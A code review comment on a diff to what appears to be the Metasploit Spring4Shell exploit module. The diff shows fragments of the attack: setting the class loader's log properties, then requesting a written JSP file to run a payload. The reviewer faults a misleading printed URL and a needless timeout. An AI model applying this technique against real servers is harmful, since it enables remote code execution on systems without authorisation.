modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -125,29 +125,24 @@ def modify_class_loader(opts)
         "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
       }
     })
-
-    sleep(1)
-
-    res
   end
 
   def check_log_file
-
-    jsp_uri = normalize_uri(datastore['PAYLOAD_PATH'], @jsp_file)
-    
     print_status("#{peer} - Waiting for the server to flush the logfile")
-    sleep(5)
-
-    print_status("#{peer} - Executing JSP payload")
-    vprint_status(full_uri(jsp_uri))
-
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri("/#{@jsp_file}")
-    }, 5)
```

Comment:
This was pretty confusing. The URL that was being printed here was *not* what was being requested. The URL was also being printed on it's own with no context around it. Finally the explicit timeout in the HTTP request is bad practice when it's not necessary.